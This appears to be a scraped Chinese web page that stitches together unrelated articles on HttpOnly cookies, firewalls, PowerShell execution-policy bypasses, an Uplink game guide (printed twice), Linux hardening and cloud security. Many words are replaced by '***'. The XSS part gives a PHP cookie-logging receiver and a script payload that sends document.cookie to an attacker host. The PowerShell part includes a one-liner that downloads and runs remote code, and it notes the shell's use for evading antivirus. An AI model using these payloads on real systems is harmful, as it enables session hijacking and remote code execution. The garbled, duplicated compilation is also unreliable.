如何HttpOnly的cookie与AJAX请求工作

随着B/S的普及，我们平时上网都是依赖于http协议完成，而Http是无状态的，即同一个会话的连续两个请求互相不了解，他们由最新实例化的环境进行解析，除了应用本身可能已经存储在全局对象中的所有信息外，该环境不保存与会话有关的任何信息，http是不会为了下一次连接而维护这次连接所传输的信息的。所以为了在每次会话之间传递信息，就需要用到cookie和session，无论是什么，都是为了让服务器端获得一个token来检查合法性，很多时候都是在cookie中存储一个sessionID，服务器来识别该用户，那么安全隐患也就引申而出了，只要获得这个cookie，就可以取得别人的身份，特别是管理员等高级权限帐号时，危害就大了，而XSS就是在别人的应用程序中恶意执行一段 *** 以窃取用户的cookie。

那么如何获得Cookie劫持呢?在浏览器中的document对象中，就储存了Cookie的信息，而利用js可以把这里面的Cookie给取出来，只要得到这个Cookie就可以拥有别人的身份了。下面简单说说如何窃取cookie。

接收cookie的PHP文件ck.php为：

?php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$time=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

$fp = fopen('cookie.txt', 'a');

fwrite($fp, 'Cookie: '.$cookie.'br IP: ' .$ip. 'br Date and Time: ' .$time. 'br Referer: '.$referer.'brbrbr');

fclose($fp);

?

把这个文件放在自己的服务器上，比如我们搭建的服务器为：http://10.65.21.78:8080 .

那么构造XSS语句：

scriptwindow.open('http://10.65.21.78:8080/ck.php?c='+document.cookie)/script

当执行script成功时就会把cookie发送到自己的服务器下cookie.txt文件中。XSS攻击是多么可怕的事情。

说了这么多，貌似还没有提到HttpOnly，这是哪般？莫及！这就到了！如何保障我们的Cookie安全呢？Cookie都是通过document对象获取的，我们如果能让cookie在浏览器中不可见就可以了，那HttpOnly就是在设置cookie时接受这样一个参数，一旦被设置，在浏览器的document对象中就看不到cookie了。而浏览器在浏览网页的时候不受任何影响，因为Cookie会被放在浏览器头中发送出去(包括Ajax的时候)，应用程序也一般不会在 *** 里操作这些敏感Cookie的，对于一些敏感的Cookie我们采用HttpOnly，对于一些需要在应用程序中用 *** 操作的cookie我们就不予设置，这样就保障了Cookie信息的安全也保证了应用。

给浏览器设置Cookie的头如下：

Set-Cookie: =[; =]

[; expires=][; domain=]

[; path=][; secure][; HttpOnly]

如果 Cookie 具有 HttpOnly 特性且不能通过客户端脚本访问，则为 true；否则为 false。默认值为 false。

但是，也可以看到HttpOnly并不是万能的，首先它并不能解决XSS的问题，仍然不能 *** 一些有耐心的黑客的攻击，甚至一些基于XSS的proxy也出现了，但是已经可以提高攻击的门槛了，起码XSS攻击不是每个脚本小子都能完成的了，而且其他的那些攻击手法因为一些环境和技术的限制，并不像Cookie窃取这种手法一样通用。

HttpOnly也是可能利用一些漏洞或者配置Bypass的，关键问题是只要能取到浏览器发送的Cookie头就可以了。譬如以前出现的Http Trace攻击就可以将你的Header里的Cookie回显出来，利用Ajax或者flash就可以完成这种攻击，这种手法也已经在Ajax和flash中获得修补。另外一个关于配置或者应用程序上可能Bypass的显著例子就是phpinfo，大家知道phpinfo会将浏览器发送的http头回显出来，其中就包括我们保护的auth信息，而这个页面经常存在在各种站点上，只要用ajax取phpinfo页面，取出header头对应的部分就可以获得Cookie了。一些应用程序的不完善也可能导致header头的泄露，这种攻击方式对于基本验证保护的页面一样可以攻击。

HttpOnly在IE 6以上，Firefox较新版本都得到了比较好的支持，并且在如Hotmail等应用程序里都有广泛的使用，并且已经是取得了比较好的安全效果。

那问题就来了，大家想想，HttpOnly 主要是为了限制web页面程序的browser端script程序读取cookie， 实际是浏览器通过协议实现限制的，黑客可不会那么傻，肯定不会用HTTP协议来读取cookie，肯定是在socket层面写抓包程序，相当于写一个低于IE6版本的应用程序。

所以，HttpOnly并不是万能的。

电脑防火墙什么作用

一、防火墙的基本概念

古时候，人们常在寓所之间砌起一道砖墙，一旦火灾发生，它能够防止火势蔓延到别的寓所。现在，如果一个 *** 接到了Internet上面，它的用户就可以访问外部世界并与之通信。但同时，外部世界也同样可以访问该 *** 并与之交互。为安全起见，可以在该 *** 和Internet之间插入一个中介系统，竖起一道安全屏障。这道屏障的作用是阻断来自外部通过 *** 对本 *** 的威胁和入侵，提供扼守本 *** 的安全和审计的唯一关卡，它的作用与古时候的防火砖墙有类似之处，因此我们把这个屏障就叫做“防火墙”。

在电脑中，防火墙是一种装置，它是由软件或硬件设备组合而成，通常处于企业的内部局域网与Internet之间，限制Internet用户对内部 *** 的访问以及管理内部用户访问外界的权限。换言之，防火墙是一个位于被认为是安全和可信的内部 *** 与一个被认为是不那么安全和可信的外部 *** (通常是Internet)之间的一个封锁工具。防火墙是一种被动的技术，因为它假设了 *** 边界的存在，它对内部的非法访问难以有效地控制。因此防火墙只适合于相对独立的 *** ，例如企业内部的局域 *** 等。

二、防火墙的基本准则

1.过滤不安全服务

基于这个准则，防火墙应封锁所有信息流，然后对希望提供的安全服务逐项开放，对不安全的服务或可能有安全隐患的服务一律扼杀在萌芽之中。这是一种非常有效实用的 *** ，可以造成一种十分安全的环境，因为只有经过仔细挑选的服务才能允许用户使用。

2.过滤非法用户和访问特殊站点

基于这个准则，防火墙应先允许所有的用户和站点对内部 *** 的访问，然后 *** 管理员按照IP地址对未授权的用户或不信任的站点进行逐项屏蔽。这种 *** 构成了一种更为灵活的应用环境， *** 管理员可以针对不同的服务面向不同的用户开放，也就是能自由地设置各个用户的不同访问权限。

三、防火墙的基本措施

防火墙安全功能的实现主要采用两种措施。

1. *** 服务器(适用于拨号上网)

这种方式是内部 *** 与Internet不直接通讯，内部 *** 计算机用户与 *** 服务器采用一种通讯方式，即提供内部 *** 协议（NetBIOS、TCP/IP）， *** 服务器与Internet之间的通信采取的是标准TCP/IP *** 通信协议，防火墙内外的计算机的通信是通过 *** 服务器来中转实现的，结构如下所示:

内部 *** → *** 服务器→Internet

这样便成功地实现了防火墙内外计算机系统的隔离，由于 *** 服务器两端采用的是不同的协议标准，所以能够有效地阻止外界直接非法入侵。

*** 服务器通常由性能好、处理速度快、容量大的计算机来充当，在功能上是作为内部 *** 与Internet的连接者，它对于内部 *** 来说像一台真正的服务器一样，而对于互联网上的服务器来说，它又是一台客户机。当 *** 服务器接受到用户的请求以后，会检查用户请求的站点是否符合设定要求，如果允许用户访问该站点的话， *** 服务器就会和那个站点连接，以取回所需信息再转发给用户。

另外， *** 服务器还能提供更为安全的选项，例如它可以实施较强的数据流的监控、过滤、记录和报告功能，还可以提供极好的访问控制、登录能力以及地址转换能力。但是这种防火墙措施，在内部 *** 终端机很多的情况下，效率必然会受到影响， *** 服务器负担很重，并且许多访问Internet的客户软件在内部 *** 计算机中无法正常访问Internet。

2.路由器和过滤器

这种结构由路由器和过滤器共同完成对外界计算机访问内部 *** 的限制，也可以指定或限制内部 *** 访问Internet。路由器只对过滤器上的特定端口上的数据通讯加以路由，过滤器的主要功能就是在 *** 层中对数据包实施有选择的通过，依照IP（Internet Protocol）包信息为基础，根据IP源地址、IP目标地址、封装协议端口号，确定它是否允许该数据包通过。这种防火墙措施更大的优点就是它对于用户来说是透明的，也就是说不须用户输入账号和密码来登录，因此速度比 *** 服务器快，且不容易出现瓶颈现象。然而其缺点也是很明显的，就是没有用户的使用记录，这样我们就不能从访问记录中发现非法入侵的攻击记录。

哪些 *** 可以绕过PowerShell Execution Policy

默认情况下，PowerShell禁止PowerShell脚本在Windows系统中执行。这会妨碍渗透测试员，系统管理员，和开发人员……在这里我将在没有系统管理员权限的情况下通过15个 *** 来绕过PowerShell execution policy。

我肯定还有很多的技术漏了（或者我根本不知道），但希望这篇文章将给需要它的人提供一个良好的开端。

什么是PowerShell Execution Policy?

PowerShell execution policy 是用来决定哪些类型的PowerShell脚本可以在系统中运行。默认情况下，它是“ Restricted ”(限制)的。然而，这个设置从来没有算是一种安全控制。相反，它会阻碍管理员操作。这就是为什么我们有这么多绕过它的 *** 。包括一些微软提供的。更多关于在PowerShell执行政策设置，默认的安全控制的设置。我建议阅读Carlos Perez的 博客 。他提供了一个很好的概述。

为什么要绕过执行政策？

我听到的最多的原因是因为人们希望实现自动化操作，但下面还有一些其他原因致使PowerShell在管理员、渗透测试员、黑客们手中如此流行：

支持Windows

能调用Windows API

能在不写入磁盘的情况下运行命令

能避免病毒的检测

总是被标记为"信任"。是大部分应用程序的白名单一员。

曾写出过许多的开源渗透测试工具包

如何查看Execution Policy

在能够使用所有完美功能的PowerShell之前，攻击者可以绕过“Restricted”(限制)execution

policy。你可以通过PowerShell命令“executionpolicy“看看当前的配置。如果你之一次看它的设置可能设置为

“Restricted”(限制)，如下图所示

PS C: Get-ExecutionPolicy

同样值得注意的是execution policy可以在系统中设置不同的级别。要查看他们使用下面的命令列表。更多信息可以点击这里查看微软的“Set-ExecutionPolicy” 。

Get-ExecutionPolicy -List | Format-Table -AutoSize

实验环境说明

在下面的例子中我将使用一个名为runme.ps1的脚本，它将包含以下PowerShell命令来写出一个消息到控制台：

Write-Host "My voice is my passport, verify me."

当我试图在一个带有默认execution policy的系统上执行它时，我得到以下错误：

如果你目前的execution

policy是开放的，你想让它更严格的测试，下面的技巧，然后从管理员PowerShell控制台运行命令“Set-ExecutionPolicy

Restricted”。OK，那我接着BB了，接下来我会通过15种 *** 来绕过PowerShell execution policy的限制。

绕过PowerShell Execution Policy

1. 把脚本直接粘贴到交互式的PowerShell控制台

复制并粘贴你的PowerShell脚本为一个交互式控制台如下图所示。但是，请记住，你将被当前用户权限限制。这是最基本的例子，当你有一个交互控制台时，可以方便快速地运行脚本。此外，这种技术不会更改配置或需要写入磁盘。

2. Echo脚本并PowerShell的标准输入

简单的ECHO脚本到PowerShell的标准输入。这种技术不会导致配置的更改或要求写入磁盘。

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -

3. 从文件中读取脚本并通过PowerShell的标准输入

使用Windows的"type"命令或PowerShell的"Get-Content"命令来从磁盘读取你的脚本并输入到标准的

PowerShell中，这种技术不会导致配置文件的更改，但是需要写入磁盘。然而，如果你想试图避免写到磁盘，你可以从 *** 上读取你的脚本。

例1:Get-Content Powershell命令

Get-Content .runme.ps1 | PowerShell.exe -noprofile -

例2:Type 命令

TYPE .runme.ps1 | PowerShell.exe -noprofile -

4. 从 *** 上下载脚本并通过IEX执行它

这种技术可以用来从网上下载一个PowerShell脚本并执行它无需写入磁盘。它也不会导致任何配置更改。我已经看到它有许多创造性的使用 *** ，但最近看到它被引用到一个不错的Matt Graeber的PowerSploit博客上。

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"

5. 使用Command

这种技术和通过复制和粘贴来执行一个脚本是非常相似的，但它可以做没有交互式控制台。这是很好的方式适合执行简单的脚本，但更复杂的脚本通常容易出现错误。这种技术不会导致配置更改或要求写入磁盘。

例1:完整的命令

Powershell -command "Write-Host 'My voice is my passport, verify me.'"

例2:简短的命令

Powershell -c "Write-Host 'My voice is my passport, verify me.'"

6. 使用EncodeCommand

这和使用"Command"命令非常像，但它为所有的脚本提供了一个Unicode /

Base64编码串。通过这种方式加密你的脚本可以帮你绕过所有通过"Command"执行时会遇到的错误。这种技术不会导致配置文件的更改或要求写入磁

盘。下面的示例来自 Posh-SecMod。

例1: 完整的命令

$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

例2: 通过简短的命令使用编码串

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

7. 使用Invoke-Command命令

我在obscuresec的博客看到了这种有趣的 *** 。这是一个典型的通过交互式PowerShell控制台执行的 *** 。但最酷的是当PowerShell远程处理开启时我可以用它来对远程系统执行命令。这种技术不会导致配置更改或要求写入磁盘。

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}

基于obscuresec博客，下面的命令还可以用来抓取从远程计算机的execution policy并将其应用到本地计算机。

invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. 使用Invoke-Expression命令

这是另一个典型的通过交互式PowerShell控制台执行的 *** 。这种技术不会导致配置更改或要求写入磁盘。下面我列举了一些常用的 *** 来通过Invoke-Expression绕过execution policy。

例1：使用Get-Content的完整命令

Get-Content .runme.ps1 | Invoke-Expression

例2：使用Get-Content的简短的命令

GC .runme.ps1 | iex

9.使用"Bypass"标记Execution Policy

当你通过脚本文件执行命令的时候这是一个很好的绕过execution policy的 *** 。当你使用这个标记的时候"没有任何东西被阻止，没有任何警告或提示"。这种技术不会导致配置更改或要求写入磁盘。

PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1

10. 使用"Unrestricted"标记Execution Policy

这类似于"Bypass"标记。当你使用这个标记的时候,它会"加载所有的配置文件并运行所有的脚本。如果你运行从网上下载的一个未被签名的脚本，它会提示你需要权限",这种技术不会导致配置的更改或要求写入磁盘。

PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1

11. 使用 "Remote-Signed"标记Execution Policy

创建你的脚本，然后按照教程的操作。最后，使用下面的命令运行它：

PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1

12. 通过交换AuthorizationManager禁用ExecutionPolicy

这真是一个我碰到的来自http://www.nivot.org的创意。下面的函数可以通过一个交互式的PowerShell来执行。一旦函数

被调用"AuthorizationManager"就会被替换成空。最终结果是，接下来的会话基本上不受execution

policy的限制。然而，它的变化将被应用于会话的持续时间。

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} Disable-ExecutionPolicy .runme.ps1

13. 把ExcutionPolicy设置成Process Scope

正如我们在引言中所看到的，执行策略可以应用于多层次的。这包括你控制的过程。使用这种技术，执行策略可以被设置为您的会话的持续时间不受限制。此外，它不会导致在配置更改，或需要写入到磁盘。我最初发现这种技术来自r007break博客。

Set-ExecutionPolicy Bypass -Scope Process

14. 通过命令设置ExcutionPolicy为CurrentUser Scope

这种 *** 和上面那种类似。但是这种 *** 通过修改注册表将当前用户环境的设置应用到当前用户的环境中。此外，它不会导致在配置更改，或需要写入到磁盘。我最初发现这种技术来自r007break博客。

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

15. 通过注册表设置ExcutionPolicy为CurrentUser Scope

在这个例子中，我展示了如何通过修改注册表项来改变当前用户的环境的执行策略。

HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell

总结

我觉得这里的主题是：使用的execution policy不一定是开发商，管理员，或者。微软从来没有打算将它成为一个安全控制。这就是为什么有这么多选择绕过它。微软很好地提供了一些本地选项和安全社区也拿出一些真正有趣的把戏。

为什么我玩Uplink(黑客精英)总是被抓？

1(7)Mission任务

Uplink测试任务是一项很容易完成的任务.要接受其他任务的话,请连接到Uplink Internal Services Machine,然后去Missions section部分.你将看到一些任务已经可以被接受.你可以选择自己想要完成的任务,然后等待雇主的回复.你将发现你必需升级你的硬件和软件才能完成一些复杂的任务.

2.Secure Connections安全连接

2(1).Introduction前言

当你连接至另一台计算机时,你的Gateway(在这里可以理解成你的本地电脑)和目标计算机之间就会建立一个直接连接(Direct connection).这种连接方式可以让对方很轻易的就跟踪到你的Gateway上,是最不安全的.如果你的Gateway被追踪到,你将收到一封警告信,并且有可能受到被控告的危险(就是进监狱拉,有时会让你付点money了事).

这部分我们将教你怎样建立不被对方追踪的安全连接 *** .

2(2).Call bouncing(这里我不知道怎么翻,就翻成跳跃式连接吧)

之一种建立安全的不被追踪的连接 *** 是通过穿越多个服务器来连接.为了追踪你,目标机器的agents(这里可以理解成网管的意思)不得不要花费时间来逐个的追踪你所穿越的每个服务器的连接.他们最终能追踪到你,但是需要花费很多时间,而你可以通过Trace Tracker来了解他们所追踪的进度,一旦他们快追到了,你可以断开连接.

这种多服务器连接的 *** 可以通过大地图画面,单击你所需要穿越的服务器,最终单击你的目标服务器,然后单击Connect按钮来建立连接.

2(3).Active Traces主动追踪

只要你的行动被怀疑,目标系统就将开始追踪你.这就叫做主动追踪.许多系统会运行安全软件来通过确定的你所做的关键行动来追踪你,并且尝试替换密码和取消admin帐号.你可以通过Trace Tracker这个软件或右上角的迷你地图来了解他们的追踪状态,请务必在他们追踪完成前断开与目标系统的连接.

2(4).Passive Traces被动追踪

你在目标系统所做的每一件事都会被记录进目标系统的log(日志)里,当你在对方服务器的主动追踪完成前断开与目标服务器的连接的话,目标服务器的网管就会尝试利用log里你所留下的信息来追踪你,这就叫做被动追踪.虽然这种追踪方式所要耗费的时间很长,但是一旦被对方追查到,后果是很严重的,你就等着收对方的警告信吧.你可以在断开与对方系统的连接前利用Log Deleter这个工具来删除你所留下的log(在Log view里).记住,这是你每次行动的最后一步也是必需的一步.

2(5)Trace tracking

在你作案的同时(请允许我用这个词),对方服务器的使用者肯定会尝试追踪你,你一定要学会如何使用工具来了解他们追踪的情况.

你可以从Software sales窗口下买到HUD upgrade和Trace Tracker.前者是通过右上角的迷你地图来给你一个视觉上的情况,后者是通过百分率,倒计时来给你了解对方追踪你的进度,你可以购买这些软件的最新版本来增加它们的性能.

2(6)Active Tips主动技巧

当你利用穿越多个服务器的连接方式时,如果在这些服务器中有你的用户帐号的话,对方的追踪将会被延长,如果有你的admin帐号的话,就会延长更久.

命令行(Command Line)

help cmd

:help on a specific command

dir

:list all files in current directory

cd dir

:change directory into 'dir'

run program

:run a program on the system

delete

:delete all files in the current directory

shutdown

:shut down and restart the system

disconnect

:disconnect from this system

exit

:return to the menu

如何从银行偷钱

首先配备要好，更好要有HUD-ConnectionAnalysis、和Proxy_Bypass、monitor_bypass，firewall的可以没有。密码破戒软件和语音识别软件以及破戒矩阵密码的软件都是必备的。

好，开始：

1、找一个目标，当然是银行了。进去开一个账号，这里暂时叫做账号1吧。（这里不用跳跃节点）。

2、设置好跳跃节点，之一个更好是InterNIC,原因不用说了。登上目标银行的服务器，然后打开HCA,将PB和MB挂上去。好了，你可以为所欲为了。根本没有时间限制。

3、破解密码进去后（ *** 可以看我前面的贴子），找一个用户（有钱的，这里取名账号2）记住他的密码，删除Log痕迹，返回之一个页面。

4、用账号2登入，然后转账到你新建的账号1中去。然后把转账记录删除。

5、用账号1登入，看看钱到了没有，然后也把转账记录删除。

6、再登入Administrator，删除你的LOg痕迹。

7、删除InterNIC的log痕迹。

8、看看News，快进，看看会不会被抓。反正我是成功了。现在已经把电脑升级到顶级配备了。速度没的说。而且已经开始做9级别的任务了。

求uplink游戏攻略

1(7)Mission任务

Uplink测试任务是一项很容易完成的任务.要接受其他任务的话,请连接到Uplink Internal Services Machine,然后去Missions section部分.你将看到一些任务已经可以被接受.你可以选择自己想要完成的任务,然后等待雇主的回复.你将发现你必需升级你的硬件和软件才能完成一些复杂的任务.

2.Secure Connections安全连接

2(1).Introduction前言

当你连接至另一台计算机时,你的Gateway(在这里可以理解成你的本地电脑)和目标计算机之间就会建立一个直接连接(Direct connection).这种连接方式可以让对方很轻易的就跟踪到你的Gateway上,是最不安全的.如果你的Gateway被追踪到,你将收到一封警告信,并且有可能受到被控告的危险(就是进监狱拉,有时会让你付点money了事).

这部分我们将教你怎样建立不被对方追踪的安全连接 *** .

2(2).Call bouncing(这里我不知道怎么翻,就翻成跳跃式连接吧)

之一种建立安全的不被追踪的连接 *** 是通过穿越多个服务器来连接.为了追踪你,目标机器的agents(这里可以理解成网管的意思)不得不要花费时间来逐个的追踪你所穿越的每个服务器的连接.他们最终能追踪到你,但是需要花费很多时间,而你可以通过Trace Tracker来了解他们所追踪的进度,一旦他们快追到了,你可以断开连接.

这种多服务器连接的 *** 可以通过大地图画面,单击你所需要穿越的服务器,最终单击你的目标服务器,然后单击Connect按钮来建立连接.

2(3).Active Traces主动追踪

只要你的行动被怀疑,目标系统就将开始追踪你.这就叫做主动追踪.许多系统会运行安全软件来通过确定的你所做的关键行动来追踪你,并且尝试替换密码和取消admin帐号.你可以通过Trace Tracker这个软件或右上角的迷你地图来了解他们的追踪状态,请务必在他们追踪完成前断开与目标系统的连接.

2(4).Passive Traces被动追踪

你在目标系统所做的每一件事都会被记录进目标系统的log(日志)里,当你在对方服务器的主动追踪完成前断开与目标服务器的连接的话,目标服务器的网管就会尝试利用log里你所留下的信息来追踪你,这就叫做被动追踪.虽然这种追踪方式所要耗费的时间很长,但是一旦被对方追查到,后果是很严重的,你就等着收对方的警告信吧.你可以在断开与对方系统的连接前利用Log Deleter这个工具来删除你所留下的log(在Log view里).记住,这是你每次行动的最后一步也是必需的一步.

2(5)Trace tracking

在你作案的同时(请允许我用这个词),对方服务器的使用者肯定会尝试追踪你,你一定要学会如何使用工具来了解他们追踪的情况.

你可以从Software sales窗口下买到HUD upgrade和Trace Tracker.前者是通过右上角的迷你地图来给你一个视觉上的情况,后者是通过百分率,倒计时来给你了解对方追踪你的进度,你可以购买这些软件的最新版本来增加它们的性能.

2(6)Active Tips主动技巧

当你利用穿越多个服务器的连接方式时,如果在这些服务器中有你的用户帐号的话,对方的追踪将会被延长,如果有你的admin帐号的话,就会延长更久.

命令行(Command Line)

help cmd

:help on a specific command

dir

:list all files in current directory

cd dir

:change directory into 'dir'

run program

:run a program on the system

delete

:delete all files in the current directory

shutdown

:shut down and restart the system

disconnect

:disconnect from this system

exit

:return to the menu

如何从银行偷钱

首先配备要好，更好要有HUD-ConnectionAnalysis、和Proxy_Bypass、monitor_bypass，firewall的可以没有。密码破戒软件和语音识别软件以及破戒矩阵密码的软件都是必备的。

好，开始：

1、找一个目标，当然是银行了。进去开一个账号，这里暂时叫做账号1吧。（这里不用跳跃节点）。

2、设置好跳跃节点，之一个更好是InterNIC,原因不用说了。登上目标银行的服务器，然后打开HCA,将PB和MB挂上去。好了，你可以为所欲为了。根本没有时间限制。

3、破解密码进去后（ *** 可以看我前面的贴子），找一个用户（有钱的，这里取名账号2）记住他的密码，删除Log痕迹，返回之一个页面。

4、用账号2登入，然后转账到你新建的账号1中去。然后把转账记录删除。

5、用账号1登入，看看钱到了没有，然后也把转账记录删除。

6、再登入Administrator，删除你的LOg痕迹。

7、删除InterNIC的log痕迹。

8、看看News，快进，看看会不会被抓。反正我是成功了。现在已经把电脑升级到顶级配备了。速度没的说。而且已经开始做9级别的任务了。

Linux登录和启动的安全性涉及哪些5个方面

1.Linux内核攻防.首先得系统的了解Linux内核体系.了解近期的安全机制比如 *** EP( Sandybridge加入）和 *** AP（本来应该是Haswell加入.最终推迟到了broadwell时才加入）.这时就可以开始研究如何针对这些安全机制的bypass.同时在防御的一边可以研究超越 *** EP/ *** AP的防御：PaX/Grsecurity.了解从features和代码级别的加固如何构成Linux内核级别的纵深防御体系。除了Linux内核.OpenBSD也值得研究.OpenBSD社区非常重视安全.从社区流程和文化.到代码审计机制.到mitigation的开发都体现出了对安全的重视.最近的pledege syscall也是build-security-in的哲学下的产物.另外FreeBSD的fork之一HardenedBSD也尝试实现一些PaX的feature.非常值得一玩。

2.编译器领域.主要是各种mitigation.传统的实现有NX/PIE/RELRO/CANARY.

近期不少研究人员把精力都放到了2个方面：

1.去实现一个编译完成后尽量少的ROP gadget的二进制代码.这个主要用于对抗ROP利用.这种方式FW年初的设计主要是针对常用能被ROP用到的指令在compile-time做blacklist--alternative.

2.类似CFI的实现去一定程度上加大ROP的难度。

3.Firmware安全.这一块Xeno Kovah是专家.可以看看他之前的研究以及成果.这一块的攻防在地下已经暗战多年.最近2年由于SNOWDEN大爷曝光棱镜后也开始受到企业界的重视。

4.密码工程.在一个BEAST/CRIME/LUCKY13/HEARTBLEED/POODLE满天飞的年代.SSL/TLS在类UNIX平台上的诸多实现都有可改进的空间.OpenSSL/GnuTLS/NSS都需要大量的改进.这一块也是年轻人可以考虑研究的方向。

5.GNU/Linux安全运维体系.这一块属于传统GNU/Linux安全运维当中的范畴.包括安标合规（比如STIG-for-Debian）.ACL.DAC/MAC/RBAC.seccomp sandboxing.iptables/nftables/netfilter.auditd.内核参数调优等。这一块可以参考：

Debian GNU/Linux security checklist and hardening

6.基于自由软件的场景化加固.这一块对于企业用户非常重要.通常在安全咨询项目中企业最关心的就是成百上千条的checklist如何根据业务场景的需求把她们部署上去.前提条件是不能影响业务.这对DEVOPS提出了较高的要求.TESTING EVN--REGRESSION CASES--PRODUCTION ENV是基本的流程。

7.生态圈.这一块是国内很少关注的领域.也就是企业如何参与自由软件社区从而获得相应的商业回报.这一块不是单纯的技术问题.需要更多的非CS学科的同学们的参与。另外.在法律方面也没有人跟进过自由软件的许可证（GPL/BSD/MIT/APACHE）在中国法律体系下的情况.希望有更多的法律领域的黑客的去hacking这一块中国的处女地.个人认为自由软件相关法律的重要不亚于技术.中国也需要类似FSF/FSFE/EFF这样的数字法律援助机构。

黑客 为什么 用powershell

owershell是windows下面非常强大的命令行工具，并且在windows中Powershell可以利用.NET Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。 除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来 *** 钓鱼文件。

云计算应用存在哪些问题，采取哪些安全防护措施

云计算存在的一些问题:

虚拟化安全问题：如果物理主机受到破坏，其所管理的虚拟服务器由于存在和物理主机的交流，有可能被攻克，若物理主机和虚拟机不交流，则可能存在虚拟机逃逸。如果物理主机上的虚拟 *** 受到破坏，由于存在物理主机和虚拟机的交流，以及一台虚拟机监控另一台虚拟机的场景，导致虚拟机也会受到损害。

2.数据集中的安全问题：用户的数据存储、处理、 *** 传输等都与云计算系统有关，包括如何有效存储数据以避免数据丢失或损坏，如何对多租户应用进行数据隔离，如何避免数据服务被阻塞等等。

3.云平台可用性问题：用户的数据和业务应用处于云平台遭受攻击的问题系统中，其业务流程将依赖于云平台服务连续性、SLA和IT流程、安全策略、事件处理和分析等提出了挑战。另外，当发生系统故障时，如何保证用户数据的快速恢复也成为一个重要问题。

4.云平台遭受攻击的问题：云计算平台由于其用户、信息资源的高度集中，容易成为黑客攻击的目标，由此拒绝服务造成的后果和破坏性将会明显超过传统的企业网应用环境。

5.法律风险：云计算应用地域弱、信息流动性大，信息服务或用户数据可能分布在不同地区甚至是不同国家，在 *** 信息安全监管等方面存在法律差异与纠纷;同时由于虚拟化等技术引起的用户间物理界限模糊可能导致的司法取证问题也不容忽视

云计算的安全防护措施：

1基础设施安全

基础设施安全包括服务器系统安全、 *** 管理系统安全、域名系统安全、 *** 路由系统安全、局域网和VLAN配置等。主要的安全措施包括安全冗余设计、漏洞扫描与加固，IPS/IDS、DNSSec等。考虑到云计算环境的业务持续性，设备的部署还须要考虑到高可靠性的支持，诸如双机热备、配置同步，链路捆绑聚合及硬件Bypass等特性，实现大流量汇聚情况下的基础安全防护。

2数据安全

云数据安全包含的内容远远不只是简单的数据加密。数据安全的需求随着三种服务模式，四种部署模式(公共云、私有云、社区云、混合云)以及对风险的承受能力而变化。满足云数据安全的要求，需要应用现有的安全技术，并遵循健全的安全实践，必须对各种防范措施进行全盘考虑，使其构成一道弹性的屏障。主要安全措施包括对不同用户数据进行虚拟化的逻辑隔离、使用身份认证及访问管理技术措施等，从而保障静态数据和动态数据的保密性、完整性、可用性、真实性、授权、认证和不可抵赖性。

3虚拟化安全

虚拟化的安全包括两方面的问题：一是虚拟技术本身的安全，二是虚拟化引入的新的安全问题。虚拟技术有许多种，最常用的是虚拟机(VM)技术，需考虑VM内的进程保护，此外还有Hypervisor和其他管理模块这些新的攻击层面。可以采用的安全措施有：虚拟镜像文件的加密存储和完整性检查、VM的隔离和加固、VM访问控制、虚拟化脆弱性检查、VM进程监控、VM的安全迁移等。

4身份认证与访问管理(IAM，IdentityandAccessManagement)

IAM是用来管理数字身份并控制数字身份如何访问资源的 *** 、技术和策略，用于确保资源被安全访问的业务流程和管理手段，从而实现对企业信息资产进行统一的身份认证、授权和身份数据集中化的管理与审计。IAM是保证云计算安全运行的关键所在。传统的IAM管理范畴，例如自动化管理用户账号、用户自助式服务、认证、访问控制、单点登录、职权分离、数据保护、特权用户管理、数据防丢失保护措施与合规报告等，都与云计算的各种应用模式息息相关。

IAM并不是一个可以轻易部署并立即产生效果的整体解决方案，而是一个由各种技术组件、过程和标准实践组成的体系架构。标准的企业级IAM体系架构包含技术、服务和过程等几个层面，其部署体系架构的核心是目录服务，目录服务是机构用户群的身份、证书和用户属性的信息库。

5应用安全

由于云环境的灵活性、开放性以及公众可用性等特性，给应用安全带来了很多挑战。云计算的应用主要通过Web浏览器实现。因此，在云计算中，对于应用安全，尤其需要注意的是Web应用的安全。要保证SaaS的应用安全，就要在应用的设计开发之初，制定并遵循适合SaaS模式的安全开发生命周期规范和流程，从整体生命周期上去考虑应用安全。可以采用的防护措施有访问控制、配置加固、部署应用层防火墙等。